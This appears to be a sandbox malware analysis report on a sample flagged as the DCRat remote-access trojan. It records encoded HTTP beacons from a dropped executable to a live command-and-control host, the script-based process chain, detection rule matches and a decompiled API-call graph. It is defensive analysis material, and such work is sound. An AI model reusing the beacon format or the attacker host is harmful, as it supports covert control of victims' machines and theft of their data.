                Jan 2, 2025 05:20:49.028161049 CET2257OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Connection: Keep-Alive
                Jan 2, 2025 05:20:49.704236031 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:20:49 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                43192.168.2.550019141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:20:54.717807055 CET2233OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Jan 2, 2025 05:20:55.391807079 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:20:55 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                44192.168.2.550020141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:21:00.403615952 CET2230OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=d1nIiojI0EWZiVTYzATYmVWZlRjZlRWZwgzY4ITOhdTY3EWOmJmIsIiZ4MjZxIzNhBzYxgzN4cTOiN2M3YWNhNGMzUjM5YDOyAjZjFDN5cjNiojImdTNyEWO4EDO1gTM0AjZmNjM5MjN2YmNyUzM3UDM1MjIsIiNkZ2N4EjM0MmM3MDZkNTMmNTM4IGMkJmYhJDOlVjNzMjZ1UmYiFWZiojIxYWY5UmYjNDM5YTZzATZlV2M0czY0EWNhRjYxcjY4UmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJN [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Connection: Keep-Alive
                Jan 2, 2025 05:21:01.080615997 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:21:00 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:23:16:53
                Start date:01/01/2025
                Path:C:\Users\user\Desktop\5Ixz5yVfS7.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\5Ixz5yVfS7.exe"
                Imagebase:0x590000
                File size:1'164'920 bytes
                MD5 hash:7B4ECCF10CC4FA7263646F2FCE4D7F8B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                Target ID:2
                Start time:23:16:54
                Start date:01/01/2025
                Path:C:\Windows\SysWOW64\wscript.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe"
                Imagebase:0x460000
                File size:147'456 bytes
                MD5 hash:FF00E0480075B095948000BDC66E81F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:3
                Start time:23:17:00
                Start date:01/01/2025
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\H0DkZX.bat" "
                Imagebase:0x790000
                File size:236'544 bytes
                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                Target ID:4
                Start time:23:17:00
                Start date:01/01/2025
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff6d64d0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                Target ID:5
                Start time:23:17:00
                Start date:01/01/2025
                Path:C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                Wow64 process (32bit):false
                Commandline:"C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe"
                Imagebase:0x850000
                File size:847'872 bytes
                MD5 hash:21879480EBF05FF55A58FC933CB818A4
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000005.00000002.4473483339.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000005.00000002.4473483339.0000000002F3C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000005.00000002.4473483339.0000000002D63000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.4473483339.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000005.00000002.4473483339.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000005.00000002.4473483339.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000005.00000002.4473483339.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                • Detection: 79%, ReversingLabs
                Reputation:low
                Has exited:false

                Reset < >

                  Execution Graph

                  Execution Coverage:9.9%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:9.3%
                  Total number of Nodes:1517
                  Total number of Limit Nodes:35
                  execution_graph 22882 599b59 22883 599bd7 22882->22883 22886 599b63 22882->22886 22884 599bad SetFilePointer 22884->22883 22885 599bcd GetLastError 22884->22885 22885->22883 22886->22884 22892 5adc5d 22893 5adc2e 22892->22893 22893->22892 22895 5adf59 22893->22895 22923 5adc67 22895->22923 22897 5adf73 22898 5adfd0 22897->22898 22899 5adff4 22897->22899 22900 5aded7 DloadReleaseSectionWriteAccess 11 API calls 22898->22900 22902 5ae06c LoadLibraryExA 22899->22902 22905 5ae0cd 22899->22905 22911 5ae0df 22899->22911 22917 5ae19b 22899->22917 22901 5adfdb RaiseException 22900->22901 22918 5ae1c9 22901->22918 22904 5ae07f GetLastError 22902->22904 22902->22905 22909 5ae0a8 22904->22909 22910 5ae092 22904->22910 22908 5ae0d8 FreeLibrary 22905->22908 22905->22911 22906 5ae1d8 22906->22893 22907 5ae13d GetProcAddress 22913 5ae14d GetLastError 22907->22913 22907->22917 22908->22911 22912 5aded7 DloadReleaseSectionWriteAccess 11 API calls 22909->22912 22910->22905 22910->22909 22911->22907 22911->22917 22914 5ae0b3 RaiseException 22912->22914 22915 5ae160 22913->22915 22914->22918 22915->22917 22919 5aded7 DloadReleaseSectionWriteAccess 11 API calls 22915->22919 22934 5aded7 22917->22934 22942 5aec4a 22918->22942 22920 5ae181 RaiseException 22919->22920 22921 5adc67 ___delayLoadHelper2@8 11 API calls 22920->22921 22922 5ae198 22921->22922 22922->22917 22924 5adc99 22923->22924 22925 5adc73 22923->22925 22924->22897 22949 5add15 22925->22949 22928 5adc94 22959 5adc9a 22928->22959 22931 5aec4a TranslatorGuardHandler 5 API calls 22932 5adf55 22931->22932 22932->22897 22933 5adf24 22933->22931 22935 5adf0b 22934->22935 22936 5adee9 22934->22936 22935->22918 22937 5add15 DloadLock 8 API calls 22936->22937 22938 5adeee 22937->22938 22939 5adf06 22938->22939 22940 5ade67 DloadProtectSection 3 API calls 22938->22940 22968 5adf0f 8 API calls 2 library calls 22939->22968 22940->22939 22943 5aec53 22942->22943 22944 5aec55 IsProcessorFeaturePresent 22942->22944 22943->22906 22946 5af267 22944->22946 22969 5af22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22946->22969 22948 5af34a 22948->22906 22950 5adc9a DloadUnlock 3 API calls 22949->22950 22951 5add2a 22950->22951 22952 5aec4a TranslatorGuardHandler 5 API calls 22951->22952 22953 5adc78 22952->22953 22953->22928 22954 5ade67 22953->22954 22955 5ade7c DloadObtainSection 22954->22955 22956 5ade82 22955->22956 22957 5adeb7 VirtualProtect 22955->22957 22967 5add72 VirtualQuery GetSystemInfo 22955->22967 22956->22928 22957->22956 22960 5adcab 22959->22960 22961 5adca7 22959->22961 22962 5adcaf 22960->22962 22963 5adcb3 GetModuleHandleW 22960->22963 22961->22933 22962->22933 22964 5adcc9 GetProcAddress 22963->22964 22966 5adcc5 22963->22966 22965 5adcd9 GetProcAddress 22964->22965 22964->22966 22965->22966 22966->22933 22967->22957 22968->22935 22969->22948 24891 5a9b50 GdipDisposeImage GdipFree __except_handler4 24843 5b8050 8 API calls ___vcrt_uninitialize 24893 5ad34e DialogBoxParamW 24844 5a8c40 GetClientRect 24845 5aec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24846 5b3040 5 API calls 2 library calls 24894 5abe49 98 API calls 3 library calls 24848 5c0040 IsProcessorFeaturePresent 23798 5ad573 23799 5ad580 23798->23799 23800 59ddd1 53 API calls 23799->23800 23801 5ad594 23800->23801 23802 59400a _swprintf 51 API calls 23801->23802 23803 5ad5a6 SetDlgItemTextW 23802->23803 23806 5aac74 PeekMessageW 23803->23806 23807 5aacc8 23806->23807 23808 5aac8f GetMessageW 23806->23808 23809 5aacb4 TranslateMessage DispatchMessageW 23808->23809 23810 5aaca5 IsDialogMessageW 23808->23810 23809->23807 23810->23807 23810->23809 24850 591075 82 API calls pre_c_initialization 24851 5a5c77 121 API calls __vsnwprintf_l 24856 5afc60 51 API calls 2 library calls 24858 5b3460 RtlUnwind 24859 5b9c60 71 API calls _free 24860 5b9e60 31 API calls 2 library calls 24896 5abe49 108 API calls 4 library calls 24897 5ba918 27 API calls 2 library calls 24898 596110 80 API calls 24899 5bb710 GetProcessHeap 24861 5aec0b 28 API calls 2 library calls 24901 5adb0b 19 API calls ___delayLoadHelper2@8 24656 5ac40e 24657 5ac4c7 24656->24657 24665 5ac42c _wcschr 24656->24665 24658 5ac4e5 24657->24658 24674 5abe49 _wcsrchr 24657->24674 24691 5ace22 24657->24691 24661 5ace22 18 API calls 24658->24661 24658->24674 24659 5aaa36 ExpandEnvironmentStringsW 24659->24674 24661->24674 24662 5aca8d 24664 5a17ac CompareStringW 24664->24665 24665->24657 24665->24664 24666 5ac11d SetWindowTextW 24666->24674 24669 5b35de 22 API calls 24669->24674 24671 5abf0b SetFileAttributesW 24672 5abfc5 GetFileAttributesW 24671->24672 24684 5abf25 ___scrt_fastfail 24671->24684 24672->24674 24676 5abfd7 DeleteFileW 24672->24676 24674->24659 24674->24662 24674->24666 24674->24669 24674->24671 24677 5ac2e7 GetDlgItem SetWindowTextW SendMessageW 24674->24677 24680 5ac327 SendMessageW 24674->24680 24685 5a17ac CompareStringW 24674->24685 24686 5a9da4 GetCurrentDirectoryW 24674->24686 24688 59a52a 7 API calls 24674->24688 24689 59a4b3 FindClose 24674->24689 24690 5aab9a 76 API calls ___std_exception_copy 24674->24690 24676->24674 24678 5abfe8 24676->24678 24677->24674 24679 59400a _swprintf 51 API calls 24678->24679 24681 5ac008 GetFileAttributesW 24679->24681 24680->24674 24681->24678 24682 5ac01d MoveFileW 24681->24682 24682->24674 24683 5ac035 MoveFileExW 24682->24683 24683->24674 24684->24672 24684->24674 24687 59b4f7 52 API calls 2 library calls 24684->24687 24685->24674 24686->24674 24687->24684 24688->24674 24689->24674 24690->24674 24692 5ace2c ___scrt_fastfail 24691->24692 24695 5acf1b 24692->24695 24699 5ad08a 24692->24699 24714 5a17ac CompareStringW 24692->24714 24694 59a180 4 API calls 24696 5acf30 24694->24696 24695->24694 24697 5acf4f ShellExecuteExW 24696->24697 24715 59b239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 24696->24715 24697->24699 24705 5acf62 24697->24705 24699->24658 24700 5acf47 24700->24697 24701 5acf9b 24716 5ad2e6 6 API calls 24701->24716 24702 5acff1 CloseHandle 24703 5ad00a 24702->24703 24704 5acfff 24702->24704 24703->24699 24710 5ad081 ShowWindow 24703->24710 24717 5a17ac CompareStringW 24704->24717 24705->24701 24705->24702 24707 5acf91 ShowWindow 24705->24707 24707->24701 24709 5acfb3 24709->24702 24711 5acfc6 GetExitCodeProcess 24709->24711 24710->24699 24711->24702 24712 5acfd9 24711->24712 24712->24702 24714->24695 24715->24700 24716->24709 24717->24703 24720 5aea00 24721 5aea08 pre_c_initialization 24720->24721 24738 5b8292 24721->24738 24723 5aea13 pre_c_initialization 24745 5ae600 24723->24745 24725 5aea9c 24753 5aef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 24725->24753 24727 5aeaa3 ___scrt_initialize_default_local_stdio_options 24728 5aea28 __RTC_Initialize 24728->24725 24729 5ae7a1 pre_c_initialization 29 API calls 24728->24729 24730 5aea41 pre_c_initialization 24729->24730 24730->24725 24731 5aea52 24730->24731 24750 5af15b InitializeSListHead 24731->24750 24733 5aea57 pre_c_initialization __except_handler4 24751 5af167 30 API calls 2 library calls 24733->24751 24735 5aea7a pre_c_initialization 24752 5b8332 38 API calls 3 library calls 24735->24752 24737 5aea85 pre_c_initialization 24739 5b82a1 24738->24739 24740 5b82c4 24738->24740 24739->24740 24754 5b895a 20 API calls __dosmaperr 24739->24754 24740->24723 24742 5b82b4 24755 5b8839 26 API calls ___std_exception_copy 24742->24755 24744 5b82bf 24744->24723 24746 5ae60e 24745->24746 24749 5ae613 ___scrt_initialize_onexit_tables ___scrt_release_startup_lock 24745->24749 24746->24749 24756 5aef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 24746->24756 24748 5ae696 24749->24728 24750->24733 24751->24735 24752->24737 24753->24727 24754->24742 24755->24744 24756->24748 24902 591f05 126 API calls __EH_prolog 24862 5aa430 73 API calls 24906 5abe49 103 API calls 4 library calls 24826 599f2f 24827 599f3d 24826->24827 24828 599f44 24826->24828 24829 599f4a GetStdHandle 24828->24829 24836 599f55 24828->24836 24829->24836 24830 599fa9 WriteFile 24830->24836 24831 599f7a 24832 599f7c WriteFile 24831->24832 24831->24836 24832->24831 24832->24836 24834 59a031 24838 597061 75 API calls 24834->24838 24836->24827 24836->24830 24836->24831 24836->24832 24836->24834 24837 596e18 60 API calls 24836->24837 24837->24836 24838->24827 24863 591025 29 API calls pre_c_initialization 22970 5aead2 22971 5aeade ___FrameUnwindToState 22970->22971 22996 5ae5c7 22971->22996 22973 5aeae5 22975 5aeb0e 22973->22975 23076 5aef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 22973->23076 22983 5aeb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 22975->22983 23007 5b824d 22975->23007 22979 5aeb2d ___FrameUnwindToState 22980 5aebad 23015 5af020 22980->23015 22983->22980 23077 5b7243 38 API calls 3 library calls 22983->23077 22991 5aebd9 22992 5aebe2 22991->22992 23078 5b764a 28 API calls _abort 22991->23078 23079 5ae73e 13 API calls 2 library calls 22992->23079 22997 5ae5d0 22996->22997 23080 5aed5b IsProcessorFeaturePresent 22997->23080 22999 5ae5dc 23081 5b2016 22999->23081 23001 5ae5e1 23002 5ae5e5 23001->23002 23090 5b80d7 23001->23090 23002->22973 23005 5ae5fc 23005->22973 23010 5b8264 23007->23010 23008 5aec4a TranslatorGuardHandler 5 API calls 23009 5aeb27 23008->23009 23009->22979 23011 5b81f1 23009->23011 23010->23008 23013 5b8220 23011->23013 23012 5aec4a TranslatorGuardHandler 5 API calls 23014 5b8249 23012->23014 23013->23012 23014->22983 23140 5af350 23015->23140 23017 5af033 GetStartupInfoW 23018 5aebb3 23017->23018 23019 5b819e 23018->23019 23142 5bb290 23019->23142 23021 5aebbc 23024 5ad5d4 23021->23024 23022 5b81a7 23022->23021 23146 5bb59a 38 API calls 23022->23146 23333 5a00cf 23024->23333 23028 5ad5f3 23382 5aa335 23028->23382 23030 5ad5fc 23386 5a13b3 GetCPInfo 23030->23386 23032 5ad606 ___scrt_fastfail 23033 5ad619 GetCommandLineW 23032->23033 23034 5ad628 23033->23034 23035 5ad6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23033->23035 23389 5abc84 23034->23389 23400 59400a 23035->23400 23041 5ad6a0 23394 5ad287 23041->23394 23042 5ad636 OpenFileMappingW 23044 5ad64f MapViewOfFile 23042->23044 23045 5ad696 CloseHandle 23042->23045 23048 5ad68d UnmapViewOfFile 23044->23048 23049 5ad660 __vsnwprintf_l 23044->23049 23045->23035 23048->23045 23053 5ad287 2 API calls 23049->23053 23055 5ad67c 23053->23055 23054 5a8835 8 API calls 23056 5ad76a DialogBoxParamW 23054->23056 23055->23048 23057 5ad7a4 23056->23057 23058 5ad7bd 23057->23058 23059 5ad7b6 Sleep 23057->23059 23060 5ad7cb 23058->23060 23433 5aa544 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 23058->23433 23059->23058 23062 5ad7ea DeleteObject 23060->23062 23063 5ad7ff DeleteObject 23062->23063 23064 5ad806 23062->23064 23063->23064 23065 5ad849 23064->23065 23066 5ad837 23064->23066 23430 5aa39d 23065->23430 23434 5ad2e6 6 API calls 23066->23434 23068 5ad83d CloseHandle 23068->23065 23070 5ad883 23071 5b757e GetModuleHandleW 23070->23071 23072 5aebcf 23071->23072 23072->22991 23073 5b76a7 23072->23073 23687 5b7424 23073->23687 23076->22973 23077->22980 23078->22992 23079->22979 23080->22999 23082 5b201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 23081->23082 23094 5b310e 23082->23094 23086 5b2031 23087 5b203c 23086->23087 23108 5b314a DeleteCriticalSection 23086->23108 23087->23001 23089 5b2029 23089->23001 23136 5bb73a 23090->23136 23093 5b203f 8 API calls 3 library calls 23093->23002 23095 5b3117 23094->23095 23097 5b3140 23095->23097 23098 5b2025 23095->23098 23109 5b3385 23095->23109 23114 5b314a DeleteCriticalSection 23097->23114 23098->23089 23100 5b215c 23098->23100 23129 5b329a 23100->23129 23102 5b2166 23107 5b2171 23102->23107 23134 5b3348 6 API calls try_get_function 23102->23134 23104 5b217f 23105 5b218c 23104->23105 23135 5b218f 6 API calls ___vcrt_FlsFree 23104->23135 23105->23086 23107->23086 23108->23089 23115 5b3179 23109->23115 23112 5b33bc InitializeCriticalSectionAndSpinCount 23113 5b33a8 23112->23113 23113->23095 23114->23098 23116 5b31ad 23115->23116 23117 5b31a9 23115->23117 23116->23112 23116->23113 23117->23116 23118 5b31cd 23117->23118 23122 5b3219 23117->23122 23118->23116 23120 5b31d9 GetProcAddress 23118->23120 23121 5b31e9 __crt_fast_encode_pointer 23120->23121 23121->23116 23123 5b3241 LoadLibraryExW 23122->23123 23128 5b3236 23122->23128 23124 5b325d GetLastError 23123->23124 23125 5b3275 23123->23125 23124->23125 23126 5b3268 LoadLibraryExW 23124->23126 23127 5b328c FreeLibrary 23125->23127 23125->23128 23126->23125 23127->23128 23128->23117 23130 5b3179 try_get_function 5 API calls 23129->23130 23131 5b32b4 23130->23131 23132 5b32cc TlsAlloc 23131->23132 23133 5b32bd 23131->23133 23133->23102 23134->23104 23135->23107 23139 5bb753 23136->23139 23137 5aec4a TranslatorGuardHandler 5 API calls 23138 5ae5ee 23137->23138 23138->23005 23138->23093 23139->23137 23141 5af367 23140->23141 23141->23017 23141->23141 23143 5bb299 23142->23143 23145 5bb2a2 23142->23145 23147 5bb188 23143->23147 23145->23022 23146->23022 23167 5b8fa5 GetLastError 23147->23167 23149 5bb195 23188 5bb2ae 23149->23188 23151 5bb19d 23197 5baf1b 23151->23197 23154 5bb1b4 23154->23145 23157 5bb1f7 23222 5b84de 23157->23222 23161 5bb1f2 23221 5b895a 20 API calls __dosmaperr 23161->23221 23163 5bb23b 23163->23157 23228 5badf1 26 API calls 23163->23228 23164 5bb20f 23164->23163 23165 5b84de _free 20 API calls 23164->23165 23165->23163 23168 5b8fbb 23167->23168 23169 5b8fc7 23167->23169 23229 5ba61b 11 API calls 2 library calls 23168->23229 23230 5b85a9 20 API calls 3 library calls 23169->23230 23172 5b8fc1 23172->23169 23174 5b9010 SetLastError 23172->23174 23173 5b8fd3 23175 5b8fdb 23173->23175 23231 5ba671 11 API calls 2 library calls 23173->23231 23174->23149 23177 5b84de _free 20 API calls 23175->23177 23179 5b8fe1 23177->23179 23178 5b8ff0 23178->23175 23180 5b8ff7 23178->23180 23181 5b901c SetLastError 23179->23181 23232 5b8e16 20 API calls pre_c_initialization 23180->23232 23233 5b8566 38 API calls _abort 23181->23233 23183 5b9002 23185 5b84de _free 20 API calls 23183->23185 23187 5b9009 23185->23187 23187->23174 23187->23181 23189 5bb2ba ___FrameUnwindToState 23188->23189 23190 5b8fa5 pre_c_initialization 38 API calls 23189->23190 23192 5bb2c4 23190->23192 23193 5bb348 ___FrameUnwindToState 23192->23193 23196 5b84de _free 20 API calls 23192->23196 23234 5b8566 38 API calls _abort 23192->23234 23235 5ba3f1 